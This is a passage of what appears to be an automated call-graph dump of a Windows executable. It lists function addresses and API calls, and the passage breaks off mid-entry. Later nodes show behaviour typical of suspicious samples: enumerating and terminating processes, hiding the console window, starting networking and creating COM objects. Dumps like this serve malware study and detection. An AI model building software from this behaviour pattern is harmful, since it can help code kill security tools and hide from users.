41686->41687 41688 7ff7abc1f4a0 50 API calls 41687->41688 41689 7ff7abc18dd0 41688->41689 41690 7ff7abc1f4a0 50 API calls 41689->41690 41691 7ff7abc18de4 41690->41691 41692 7ff7abc1eed0 50 API calls 41691->41692 41693 7ff7abc18e23 41692->41693 41694 7ff7abc1ece0 50 API calls 41693->41694 41695 7ff7abc18e5c 41694->41695 41696 7ff7abc1f4a0 50 API calls 41695->41696 41697 7ff7abc18e9b 41696->41697 41698 7ff7abc1f4a0 50 API calls 41697->41698 41699 7ff7abc18eb4 41698->41699 41700 7ff7abc1eed0 50 API calls 41699->41700 41701 7ff7abc18eee 41700->41701 41702 7ff7abc1ece0 50 API calls 41701->41702 41703 7ff7abc18f36 41702->41703 41704 7ff7abc1f4a0 50 API calls 41703->41704 41705 7ff7abc18f4a 41704->41705 41706 7ff7abc1f4a0 50 API calls 41705->41706 41707 7ff7abc18f6f 41706->41707 41708 7ff7abc1ece0 50 API calls 41707->41708 41709 7ff7abc18f7c 41708->41709 41710 7ff7abc1ece0 50 API calls 41709->41710 41711 7ff7abc18f89 41710->41711 41712 7ff7abc1f4a0 50 API calls 41711->41712 41713 7ff7abc18fb7 41712->41713 41714 7ff7abc1f4a0 50 API calls 41713->41714 41715 7ff7abc18fcb 41714->41715 41716 7ff7abc1eed0 50 API calls 41715->41716 41717 7ff7abc1900a 41716->41717 41718 7ff7abc1f4a0 50 API calls 41717->41718 41719 7ff7abc1901e 41718->41719 41720 7ff7abc22960 50 API calls 41719->41720 41721 7ff7abc19039 41720->41721 41722 7ff7abc1f4a0 50 API calls 41721->41722 41723 7ff7abc1904d 41722->41723 41724 7ff7abc1f4a0 50 API calls 41723->41724 41725 7ff7abc19061 41724->41725 41726 7ff7abc1f4a0 50 API calls 41725->41726 41727 7ff7abc19075 41726->41727 41728 7ff7abc1eed0 50 API calls 41727->41728 41729 7ff7abc190b4 41728->41729 41730 7ff7abc1f4a0 50 API calls 41729->41730 41731 7ff7abc190c8 41730->41731 41732 7ff7abc1eed0 50 API calls 41731->41732 41733 7ff7abc19107 41732->41733 41734 7ff7abc1ece0 50 API calls 41733->41734 41735 7ff7abc19131 41734->41735 41736 7ff7abc1f4a0 50 API calls 41735->41736 41737 7ff7abc19170 41736->41737 41738 7ff7abc1f4a0 50 API calls 41737->41738 41739 7ff7abc1918b 41738->41739 41740 7ff7abc1f4a0 50 API calls 41739->41740 41741 7ff7abc1919f 41740->41741 41742 7ff7abc1eed0 50 API calls 41741->41742 41743 7ff7abc191de 41742->41743 41744 7ff7abc1f4a0 50 API calls 41743->41744 41745 7ff7abc191f2 41744->41745 41746 7ff7abc1eed0 50 API calls 41745->41746 41747 7ff7abc19231 41746->41747 41748 7ff7abc1ece0 50 API calls 41747->41748 41749 7ff7abc1926a 41748->41749 41750 7ff7abc1f4a0 50 API calls 41749->41750 41751 7ff7abc1927e 41750->41751 41752 7ff7abc1f4a0 50 API calls 41751->41752 41753 7ff7abc192a3 41752->41753 41754 7ff7abc1ece0 50 API calls 41753->41754 41755 7ff7abc192b0 41754->41755 41756 7ff7abc1ece0 50 API calls 41755->41756 41757 7ff7abc192bd 41756->41757 41758 7ff7abc1f4a0 50 API calls 41757->41758 41759 7ff7abc19308 41758->41759 41760 7ff7abc22960 50 API calls 41759->41760 41761 7ff7abc19323 41760->41761 41762 7ff7abc1f4a0 50 API calls 41761->41762 41763 7ff7abc19337 41762->41763 41764 7ff7abc1ece0 50 API calls 41763->41764 41765 7ff7abc1937a 41764->41765 41766 7ff7abc1f4a0 50 API calls 41765->41766 41767 7ff7abc193b9 41766->41767 41768 7ff7abc1ece0 50 API calls 41767->41768 41769 7ff7abc19412 41768->41769 41770 7ff7abc1f4a0 50 API calls 41769->41770 41771 7ff7abc19426 41770->41771 41772 7ff7abc1f4a0 50 API calls 41771->41772 41773 7ff7abc1944b 41772->41773 41774 7ff7abc1ece0 50 API calls 41773->41774 41775 7ff7abc19458 41774->41775 41776 7ff7abc1ece0 50 API calls 41775->41776 41777 7ff7abc19465 41776->41777 41778 7ff7abc1f4a0 50 API calls 41777->41778 41779 7ff7abc194b0 41778->41779 41780 7ff7abc22960 50 API calls 41779->41780 41781 7ff7abc194cb 41780->41781 41782 7ff7abc1f4a0 50 API calls 41781->41782 41783 7ff7abc194df 41782->41783 41784 7ff7abc1f4a0 50 API calls 41783->41784 41785 7ff7abc194f3 41784->41785 41786 7ff7abc1f4a0 50 API calls 41785->41786 41787 7ff7abc19507 41786->41787 41788 7ff7abc1eed0 50 API calls 41787->41788 41789 7ff7abc19546 41788->41789 41790 7ff7abc1f4a0 50 API calls 41789->41790 41791 7ff7abc19557 41790->41791 41792 7ff7abc1eed0 50 API calls 41791->41792 41793 7ff7abc19590 41792->41793 41794 7ff7abc1ece0 50 API calls 41793->41794 41795 7ff7abc195ba 41794->41795 41796 7ff7abc1f4a0 50 API calls 41795->41796 41797 7ff7abc195f9 41796->41797 41798 7ff7abc1f4a0 50 API calls 41797->41798 41799 7ff7abc19614 41798->41799 41800 7ff7abc1f4a0 50 API calls 41799->41800 41801 7ff7abc19628 41800->41801 41802 7ff7abc1eed0 50 API calls 41801->41802 41803 7ff7abc19667 41802->41803 41804 7ff7abc1f4a0 50 API calls 41803->41804 41805 7ff7abc19678 41804->41805 41806 7ff7abc1eed0 50 API calls 41805->41806 41807 7ff7abc196b1 41806->41807 41808 7ff7abc1ece0 50 API calls 41807->41808 41809 7ff7abc196ea 41808->41809 41810 7ff7abc1f4a0 50 API calls 41809->41810 41811 7ff7abc196fe 41810->41811 41812 7ff7abc1f4a0 50 API calls 41811->41812 41813 7ff7abc19723 41812->41813 41814 7ff7abc1ece0 50 API calls 41813->41814 41815 7ff7abc19730 41814->41815 41816 7ff7abc1ece0 50 API calls 41815->41816 41817 7ff7abc1973d 41816->41817 41818 7ff7abc1f4a0 50 API calls 41817->41818 41819 7ff7abc19788 41818->41819 41820 7ff7abc22960 50 API calls 41819->41820 41821 7ff7abc197a3 41820->41821 41822 7ff7abc1f4a0 50 API calls 41821->41822 41823 7ff7abc197b7 41822->41823 41824 7ff7abc1f4a0 50 API calls 41823->41824 41825 7ff7abc197cb 41824->41825 41826 7ff7abc1f4a0 50 API calls 41825->41826 41827 7ff7abc197df 41826->41827 41828 7ff7abc1eed0 50 API calls 41827->41828 41829 7ff7abc1981e 41828->41829 41830 7ff7abc1f4a0 50 API calls 41829->41830 41831 7ff7abc19832 41830->41831 41832 7ff7abc1eed0 50 API calls 41831->41832 41833 7ff7abc19871 41832->41833 41834 7ff7abc1ece0 50 API calls 41833->41834 41835 7ff7abc1989b 41834->41835 41836 7ff7abc1f4a0 50 API calls 41835->41836 41837 7ff7abc198da 41836->41837 41838 7ff7abc1f4a0 50 API calls 41837->41838 41839 7ff7abc198f5 41838->41839 41840 7ff7abc1f4a0 50 API calls 41839->41840 41841 7ff7abc19909 41840->41841 41842 7ff7abc1eed0 50 API calls 41841->41842 41843 7ff7abc19948 41842->41843 41844 7ff7abc1f4a0 50 API calls 41843->41844 41845 7ff7abc1995c 41844->41845 41846 7ff7abc1eed0 50 API calls 41845->41846 41847 7ff7abc1999b 41846->41847 41848 7ff7abc1ece0 50 API calls 41847->41848 41849 7ff7abc199d4 41848->41849 41850 7ff7abc1f4a0 50 API calls 41849->41850 41851 7ff7abc199e8 41850->41851 41852 7ff7abc1f4a0 50 API calls 41851->41852 41853 7ff7abc19a0d 41852->41853 41854 7ff7abc1ece0 50 API calls 41853->41854 41855 7ff7abc19a1a 41854->41855 41856 7ff7abc1ece0 50 API calls 41855->41856 41857 7ff7abc19a27 41856->41857 41858 7ff7abc1f4a0 50 API calls 41857->41858 41859 7ff7abc19a72 41858->41859 41860 7ff7abc22960 50 API calls 41859->41860 41861 7ff7abc19a8d 41860->41861 41862 7ff7abc1f4a0 50 API calls 41861->41862 41863 7ff7abc19a9e 41862->41863 41864 7ff7abc1f4a0 50 API calls 41863->41864 41865 7ff7abc19ab2 41864->41865 41866 7ff7abc1f4a0 50 API calls 41865->41866 41867 7ff7abc19ac6 41866->41867 41868 7ff7abc1eed0 50 API calls 41867->41868 41869 7ff7abc19b05 41868->41869 41870 7ff7abc1f4a0 50 API calls 41869->41870 41871 7ff7abc19b19 41870->41871 41872 7ff7abc1eed0 50 API calls 41871->41872 41873 7ff7abc19b58 41872->41873 41874 7ff7abc1ece0 50 API calls 41873->41874 41875 7ff7abc19b82 41874->41875 41876 7ff7abc1f4a0 50 API calls 41875->41876 41877 7ff7abc19bc1 41876->41877 41878 7ff7abc1f4a0 50 API calls 41877->41878 41879 7ff7abc19bdc 41878->41879 41880 7ff7abc1f4a0 50 API calls 41879->41880 41881 7ff7abc19bf0 41880->41881 41882 7ff7abc1eed0 50 API calls 41881->41882 41883 7ff7abc19c2f 41882->41883 41884 7ff7abc1f4a0 50 API calls 41883->41884 41885 7ff7abc19c43 41884->41885 41886 7ff7abc1eed0 50 API calls 41885->41886 41887 7ff7abc19c82 41886->41887 41888 7ff7abc1ece0 50 API calls 41887->41888 41889 7ff7abc19cbb 41888->41889 41890 7ff7abc1f4a0 50 API calls 41889->41890 41891 7ff7abc19ccf 41890->41891 41892 7ff7abc1f4a0 50 API calls 41891->41892 41893 7ff7abc19cf4 41892->41893 41894 7ff7abc1ece0 50 API calls 41893->41894 41895 7ff7abc19d01 41894->41895 41896 7ff7abc1ece0 50 API calls 41895->41896 41897 7ff7abc19d0e 41896->41897 41898 7ff7abc1f4a0 50 API calls 41897->41898 41899 7ff7abc19d59 41898->41899 41900 7ff7abc22960 50 API calls 41899->41900 41901 7ff7abc19d71 41900->41901 41902 7ff7abc1f4a0 50 API calls 41901->41902 41903 7ff7abc19d85 41902->41903 41904 7ff7abc1f4a0 50 API calls 41903->41904 41905 7ff7abc19d99 41904->41905 41906 7ff7abc1f4a0 50 API calls 41905->41906 41907 7ff7abc19dad 41906->41907 41908 7ff7abc1eed0 50 API calls 41907->41908 41909 7ff7abc19dec 41908->41909 41910 7ff7abc1f4a0 50 API calls 41909->41910 41911 7ff7abc19e00 41910->41911 41912 7ff7abc1eed0 50 API calls 41911->41912 41913 7ff7abc19e3f 41912->41913 41914 7ff7abc1ece0 50 API calls 41913->41914 41915 7ff7abc19e69 41914->41915 41916 7ff7abc1f4a0 50 API calls 41915->41916 41917 7ff7abc19ea8 41916->41917 41918 7ff7abc1f4a0 50 API calls 41917->41918 41919 7ff7abc19ec3 41918->41919 41920 7ff7abc1f4a0 50 API calls 41919->41920 41921 7ff7abc19ed7 41920->41921 41922 7ff7abc1eed0 50 API calls 41921->41922 41923 7ff7abc19f16 41922->41923 41924 7ff7abc1f4a0 50 API calls 41923->41924 41925 7ff7abc19f2a 41924->41925 41926 7ff7abc1eed0 50 API calls 41925->41926 41927 7ff7abc19f69 41926->41927 41928 7ff7abc1ece0 50 API calls 41927->41928 41929 7ff7abc19fa2 41928->41929 41930 7ff7abc1f4a0 50 API calls 41929->41930 41931 7ff7abc19fb6 41930->41931 41932 7ff7abc1f4a0 50 API calls 41931->41932 41933 7ff7abc19fdb 41932->41933 41934 7ff7abc1ece0 50 API calls 41933->41934 41935 7ff7abc19fe8 41934->41935 41936 7ff7abc1ece0 50 API calls 41935->41936 41937 7ff7abc19ff5 41936->41937 41938 7ff7abc1f4a0 50 API calls 41937->41938 41939 7ff7abc1a040 41938->41939 41940 7ff7abc22960 50 API calls 41939->41940 41941 7ff7abc1a05b 41940->41941 42321 7ff7abc1c790 41941->42321 41943 7ff7abc1a09a 42333 7ff7abc1c660 41943->42333 41945 7ff7abc1a0c6 42344 7ff7abc05d00 41945->42344 41947 7ff7abc1a14f 41948 7ff7abc1c660 47 API calls 41947->41948 41949 7ff7abc1a15c 41948->41949 41950 7ff7abc05d00 47 API calls 41949->41950 41951 7ff7abc1a1e2 41950->41951 41952 7ff7abc1c660 47 API calls 41951->41952 41953 7ff7abc1a1ef 41952->41953 41954 7ff7abc05d00 47 API calls 41953->41954 41955 7ff7abc1a278 41954->41955 41956 7ff7abc1c660 47 API calls 41955->41956 41957 7ff7abc1a285 41956->41957 41958 7ff7abc05d00 47 API calls 41957->41958 41959 7ff7abc1a308 41958->41959 41960 7ff7abc1c660 47 API calls 41959->41960 41961 7ff7abc1a315 41960->41961 41962 7ff7abc05d00 47 API calls 41961->41962 41963 7ff7abc1a322 41962->41963 41964 7ff7abc1c660 47 API calls 41963->41964 41965 7ff7abc1a32f 41964->41965 41966 7ff7abc05d00 47 API calls 41965->41966 41967 7ff7abc1a3b8 41966->41967 41968 7ff7abc1c660 47 API calls 41967->41968 41969 7ff7abc1a3c5 41968->41969 41970 7ff7abc05d00 47 API calls 41969->41970 41971 7ff7abc1a42d 41970->41971 41972 7ff7abc1c660 47 API calls 41971->41972 41973 7ff7abc1a43a 41972->41973 41974 7ff7abc05d00 47 API calls 41973->41974 41975 7ff7abc1a4c0 41974->41975 41976 7ff7abc1c660 47 API calls 41975->41976 41977 7ff7abc1a4cd 41976->41977 41978 7ff7abc05d00 47 API calls 41977->41978 41979 7ff7abc1a550 41978->41979 41980 7ff7abc1c660 47 API calls 41979->41980 41981 7ff7abc1a55d 41980->41981 41982 7ff7abc05d00 47 API calls 41981->41982 41983 7ff7abc1a5e3 41982->41983 42349 7ff7abc15ec0 41983->42349 41987 7ff7abc1a5ed 42513 7ff7abc07c50 41987->42513 41989 7ff7abc1a605 41990 7ff7abc1f4a0 50 API calls 41989->41990 41991 7ff7abc1a619 41990->41991 41992 7ff7abc05d00 47 API calls 41991->41992 41996 7ff7abc1a621 41992->41996 41993 7ff7abc1c2fb 41994 7ff7abc1f4a0 50 API calls 41993->41994 41995 7ff7abc1c30f 41994->41995 41997 7ff7abc05d00 47 API calls 41995->41997 41996->41993 41998 7ff7abc05d00 47 API calls 41996->41998 42002 7ff7abc1a667 41996->42002 41999 7ff7abc1c317 41997->41999 41998->41996 42000 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 41999->42000 42001 7ff7abc1c324 42000->42001 43614 7ff7abc02370 50 API calls 3 library calls 42001->43614 42002->41993 42600 7ff7abc1d0e0 42002->42600 42005 7ff7abc1c32a 42009 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42005->42009 42006 7ff7abc1b22f 42007 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42006->42007 42008 7ff7abc1b260 42007->42008 42863 7ff7abc24160 42008->42863 42013 7ff7abc1c330 42009->42013 42010 7ff7abc1c354 43618 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42010->43618 42016 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42013->42016 42014 7ff7abc260e0 50 API calls 42209 7ff7abc1a696 __std_exception_destroy memcpy_s std::_Locinfo::_Locinfo_ctor Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42014->42209 42015 7ff7abc1c35a 42018 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42015->42018 42017 7ff7abc1c336 42016->42017 43615 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42017->43615 42019 7ff7abc1c360 42018->42019 43619 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42019->43619 42020 7ff7abc244a0 50 API calls std::_Throw_Cpp_error 42020->42209 42022 7ff7abc1c342 42028 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42022->42028 42023 7ff7abc1b292 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42023->42015 42024 7ff7abc1b2f0 42023->42024 42025 7ff7abc1b4c2 42023->42025 42030 7ff7abc21fe0 10 API calls 42024->42030 42029 7ff7abc21fe0 10 API calls 42025->42029 42026 7ff7abc1c33c 42037 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42026->42037 42032 7ff7abc1c348 42028->42032 42033 7ff7abc1b4d5 42029->42033 42035 7ff7abc1b303 42030->42035 43616 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42032->43616 42038 7ff7abc222a0 87 API calls 42033->42038 42036 7ff7abc222a0 87 API calls 42035->42036 42039 7ff7abc1b30b 42036->42039 42037->42022 42042 7ff7abc1b4c0 42038->42042 42043 7ff7abc1f4a0 50 API calls 42039->42043 42046 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42042->42046 42047 7ff7abc1b31e 42043->42047 42045 7ff7abc1c34e 43617 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42045->43617 42048 7ff7abc1b50e 42046->42048 42050 7ff7abc1f4a0 50 API calls 42047->42050 43103 7ff7abc0b600 42048->43103 42054 7ff7abc1b332 42050->42054 42877 7ff7abc06190 42054->42877 42082 7ff7abc42a38 50 API calls std::_Facet_Register 42082->42209 42091 7ff7abc1f4a0 50 API calls 42091->42209 42097 7ff7abc05d00 47 API calls 42097->42209 42167 7ff7abc38f10 67 API calls 42167->42209 42195 7ff7abc374c0 58 API calls 42195->42209 42209->41999 42209->42001 42209->42005 42209->42006 42209->42010 42209->42013 42209->42014 42209->42017 42209->42020 42209->42022 42209->42026 42209->42032 42209->42045 42209->42082 42209->42091 42209->42097 42209->42167 42209->42195 42603 7ff7abc0e790 42209->42603 42734 7ff7abc208c0 42209->42734 42739 7ff7abc1ec10 42209->42739 42744 7ff7abc110f0 42209->42744 42847 7ff7abc23ad0 42209->42847 42851 7ff7abc10ff0 42209->42851 43580 7ff7abc22c60 50 API calls 4 library calls 42209->43580 43581 7ff7abc394c0 58 API calls 4 library calls 42209->43581 43582 7ff7abc22ee0 50 API calls 3 library calls 42209->43582 43583 7ff7abc38e50 42209->43583 43586 7ff7abc25e60 50 API calls 3 library calls 42209->43586 43587 7ff7abc1f4e0 42209->43587 43601 7ff7abc246a0 47 API calls 2 library calls 42209->43601 43602 7ff7abc121c0 127 API calls 7 library calls 42209->43602 43603 7ff7abc12ef0 127 API calls 7 library calls 42209->43603 43604 7ff7abc20370 42209->43604 42245->41571 42249 7ff7abc1f060 42248->42249 42249->42249 42250 7ff7abc24160 50 API calls 42249->42250 42251 7ff7abc1845a 42250->42251 42252 7ff7abc17970 42251->42252 43620 7ff7abc43600 42252->43620 42255 7ff7abc179ad 43622 7ff7abc21dc0 42255->43622 42256 7ff7abc17a10 OpenProcess 42264 7ff7abc179cf memcpy_s 42256->42264 42257 7ff7abc179c8 42259 7ff7abc42770 codecvt 8 API calls 42257->42259 42261 7ff7abc17b70 42259->42261 42260 7ff7abc17a6a K32EnumProcessModules 42262 7ff7abc17a87 K32GetModuleBaseNameW 42260->42262 42260->42264 42273 7ff7abc21fe0 42261->42273 42262->42264 42263 7ff7abc17b2b CloseHandle 42263->42264 42264->42256 42264->42257 42264->42260 42264->42263 42265 7ff7abc17b04 TerminateProcess 42264->42265 42266 7ff7abc17b1b 42265->42266 42267 7ff7abc21fe0 10 API calls 42266->42267 42268 7ff7abc17b8c 42267->42268 42269 7ff7abc21fe0 10 API calls 42268->42269 42270 7ff7abc17b97 42269->42270 42271 7ff7abc222a0 87 API calls 42270->42271 42272 7ff7abc17b9f CloseHandle 42271->42272 42272->42257 42274 7ff7abc22010 42273->42274 42275 7ff7abc21160 10 API calls 42274->42275 42278 7ff7abc2205f 42274->42278 42275->42278 42276 7ff7abc2220e 42277 7ff7abc1849c 42276->42277 43680 7ff7abc212c0 RtlPcToFileHeader RaiseException _com_raise_error 42276->43680 42283 7ff7abc22420 42277->42283 42278->42276 42280 7ff7abc2224c 42278->42280 43681 7ff7abc449c0 RtlPcToFileHeader RaiseException 42280->43681 42282 7ff7abc2229f 42284 7ff7abc2242b 42283->42284 42285 7ff7abc21160 10 API calls 42284->42285 42288 7ff7abc27096 42284->42288 42285->42288 42286 7ff7abc184ab 42286->41555 42287 7ff7abc2723a 42287->42286 43682 7ff7abc212c0 RtlPcToFileHeader RaiseException _com_raise_error 42287->43682 42288->42287 42290 7ff7abc27282 42288->42290 43683 7ff7abc449c0 RtlPcToFileHeader RaiseException 42290->43683 42292 7ff7abc272d7 42294 7ff7abc222c8 42293->42294 43684 7ff7abc272e0 42294->43684 42299 7ff7abc21160 10 API calls 42300 7ff7abc184be GetConsoleWindow ShowWindow WSAStartup 42299->42300 42300->41559 42300->41560 42302 7ff7abc1ef68 42301->42302 42303 7ff7abc1ef11 42301->42303 42304 7ff7abc42770 codecvt 8 API calls 42302->42304 43718 7ff7abc25e60 50 API calls 3 library calls 42303->43718 42307 7ff7abc1859d 42304->42307 42306 7ff7abc1ef16 42308 7ff7abc1ef5d 42306->42308 42310 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 42306->42310 42307->41576 43719 7ff7abc246a0 47 API calls 2 library calls 42308->43719 42310->42306 42312 7ff7abc42a38 std::_Facet_Register 50 API calls 42311->42312 42313 7ff7abc1861a 42312->42313 42313->41582 42315 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 42314->42315 42316 7ff7abc2297f 42315->42316 43720 7ff7abc229c0 42316->43720 42319 7ff7abc1f4e0 std::_Throw_Cpp_error 50 API calls 42320 7ff7abc18803 42319->42320 42320->41608 42322 7ff7abc42a38 std::_Facet_Register 50 API calls 42321->42322 42328 7ff7abc1c7c5 42322->42328 42323 7ff7abc1c8e6 42323->41943 42324 7ff7abc1c904 43773 7ff7abc039b0 50 API calls std::_Throw_Cpp_error 42324->43773 42326 7ff7abc42a38 std::_Facet_Register 50 API calls 42326->42328 42327 7ff7abc1f4e0 50 API calls std::_Throw_Cpp_error 42327->42328 42328->42323 42328->42324 42328->42326 42328->42327 42329 7ff7abc229c0 50 API calls 42328->42329 42329->42328 42334 7ff7abc1c676 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42333->42334 42335 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42334->42335 42336 7ff7abc1c6d5 42335->42336 42337 7ff7abc1c660 47 API calls 42336->42337 42339 7ff7abc1c6f2 42337->42339 42338 7ff7abc1c720 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42338->41945 42339->42338 42340 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42339->42340 42343 7ff7abc1c746 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42340->42343 42341 7ff7abc1c961 42343->42341 43774 7ff7abc1c6e0 47 API calls 2 library calls 42343->43774 42345 7ff7abc05d13 42344->42345 42346 7ff7abc05d37 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42344->42346 42345->42346 42347 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42345->42347 42346->41947 42348 7ff7abc05d5d 42347->42348 42350 7ff7abc42a38 std::_Facet_Register 50 API calls 42349->42350 42361 7ff7abc15f0f memcpy_s 42350->42361 42351 7ff7abc15f47 GetModuleFileNameA 42352 7ff7abc15fe1 42351->42352 42353 7ff7abc15f65 GetLastError 42351->42353 42354 7ff7abc160a8 42352->42354 42355 7ff7abc15fea GetLastError 42352->42355 42353->42352 42353->42361 42357 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42354->42357 42356 7ff7abc16015 42355->42356 42356->42356 42358 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42356->42358 42359 7ff7abc160ea 42357->42359 42411 7ff7abc1602b Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42358->42411 42362 7ff7abc178e9 42359->42362 42363 7ff7abc1610a 42359->42363 42361->42351 43775 7ff7abc27bd0 50 API calls 5 library calls 42361->43775 43777 7ff7abc02410 50 API calls std::_Throw_Cpp_error 42362->43777 42364 7ff7abc260e0 50 API calls 42363->42364 42366 7ff7abc16148 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42364->42366 42368 7ff7abc16185 CoInitializeEx 42366->42368 42410 7ff7abc178ee 42366->42410 42367 7ff7abc17955 42371 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42367->42371 42373 7ff7abc16197 42368->42373 42374 7ff7abc1629c CoCreateInstance 42368->42374 42369 7ff7abc1795b 42372 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42369->42372 42370 7ff7abc42770 codecvt 8 API calls 42375 7ff7abc178cb 42370->42375 42371->42369 42376 7ff7abc17961 42372->42376 42377 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42373->42377 42378 7ff7abc163e0 VariantInit VariantInit VariantInit VariantInit 42374->42378 42379 7ff7abc162d5 42374->42379 42483 7ff7abc05d60 CreateToolhelp32Snapshot 42375->42483 42382 7ff7abc161c0 42377->42382 42384 7ff7abc16533 VariantClear VariantClear VariantClear VariantClear 42378->42384 42380 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42379->42380 42383 7ff7abc162fe 42380->42383 42381 7ff7abc4cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42381->42367 42382->42410 42382->42411 42385 7ff7abc1633b CoUninitialize 42383->42385 42388 7ff7abc16336 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42383->42388 42383->42410 42386 7ff7abc16578 42384->42386 42387 7ff7abc16691 42384->42387 42397 7ff7abc16063 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42385->42397 42385->42411 42389 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42386->42389 42390 7ff7abc42a38 std::_Facet_Register 50 API calls 42387->42390 42388->42385 42391 7ff7abc165a1 42389->42391 42392 7ff7abc166b2 42390->42392 42393 7ff7abc165d9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42391->42393 42391->42410 42394 7ff7abc166bf SysAllocString 42392->42394 42396 7ff7abc166ef 42392->42396 42395 7ff7abc165ec CoUninitialize 42393->42395 42394->42396 42394->42410 42395->42397 42395->42411 42398 7ff7abc1672d SysFreeString 42396->42398 42403 7ff7abc16736 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42396->42403 42396->42410 42397->42369 42399 7ff7abc16096 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42397->42399 42398->42403 42399->42370 42400 7ff7abc1675d 42404 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42400->42404 42401 7ff7abc16880 42402 7ff7abc42a38 std::_Facet_Register 50 API calls 42401->42402 42405 7ff7abc16899 42402->42405 42403->42400 42403->42401 42406 7ff7abc16786 42404->42406 42407 7ff7abc168a6 SysAllocString 42405->42407 42412 7ff7abc168d6 42405->42412 42408 7ff7abc167be Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42406->42408 42406->42410 42407->42410 42407->42412 42409 7ff7abc167d1 CoUninitialize 42408->42409 42409->42397 42409->42411 42410->42381 42411->42367 42411->42397 42412->42410 42413 7ff7abc1690e SysFreeString 42412->42413 42414 7ff7abc16917 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42412->42414 42413->42414 42415 7ff7abc1696e 42414->42415 42416 7ff7abc16a91 42414->42416 42417 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42415->42417 42420 7ff7abc16ab7 42416->42420 42421 7ff7abc16be8 42416->42421 42418 7ff7abc16997 42417->42418 42418->42410 42419 7ff7abc169cf Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42418->42419 42423 7ff7abc169e2 CoUninitialize 42419->42423 42422 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42420->42422 42426 7ff7abc16c27 42421->42426 42427 7ff7abc16d58 42421->42427 42424 7ff7abc16ae0 42422->42424 42423->42397 42423->42411 42424->42410 42425 7ff7abc16b18 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42424->42425 42429 7ff7abc16b39 CoUninitialize 42425->42429 42428 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42426->42428 42432 7ff7abc16d8f 42427->42432 42433 7ff7abc16ec0 42427->42433 42430 7ff7abc16c50 42428->42430 42429->42397 42429->42411 42430->42410 42431 7ff7abc16c88 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42430->42431 42435 7ff7abc16ca9 CoUninitialize 42431->42435 42434 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42432->42434 42438 7ff7abc16ef8 42433->42438 42439 7ff7abc17029 42433->42439 42436 7ff7abc16db8 42434->42436 42435->42397 42435->42411 42436->42410 42437 7ff7abc16df0 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42436->42437 42442 7ff7abc16e11 CoUninitialize 42437->42442 42440 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42438->42440 42444 7ff7abc17065 42439->42444 42445 7ff7abc17196 42439->42445 42441 7ff7abc16f21 42440->42441 42441->42410 42443 7ff7abc16f59 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42441->42443 42442->42397 42442->42411 42449 7ff7abc16f7a CoUninitialize 42443->42449 42447 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42444->42447 42446 7ff7abc42a38 std::_Facet_Register 50 API calls 42445->42446 42448 7ff7abc171c9 42446->42448 42450 7ff7abc1708e 42447->42450 42454 7ff7abc171f5 42448->42454 43776 7ff7abc42440 25 API calls 4 library calls 42448->43776 42449->42397 42449->42411 42450->42410 42451 7ff7abc170c6 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42450->42451 42453 7ff7abc170e7 CoUninitialize 42451->42453 42453->42397 42453->42411 42454->42410 42455 7ff7abc1722f SysFreeString 42454->42455 42456 7ff7abc17238 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42454->42456 42455->42456 42457 7ff7abc1726d 42456->42457 42463 7ff7abc1739e SysAllocString 42456->42463 42458 7ff7abc244a0 std::_Throw_Cpp_error 50 API calls 42457->42458 42459 7ff7abc17296 42458->42459 42459->42410 42460 7ff7abc172ce Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42459->42460 42466 7ff7abc172ef CoUninitialize 42460->42466 42462 7ff7abc17438 VariantInit SysAllocString 42462->42410 42464 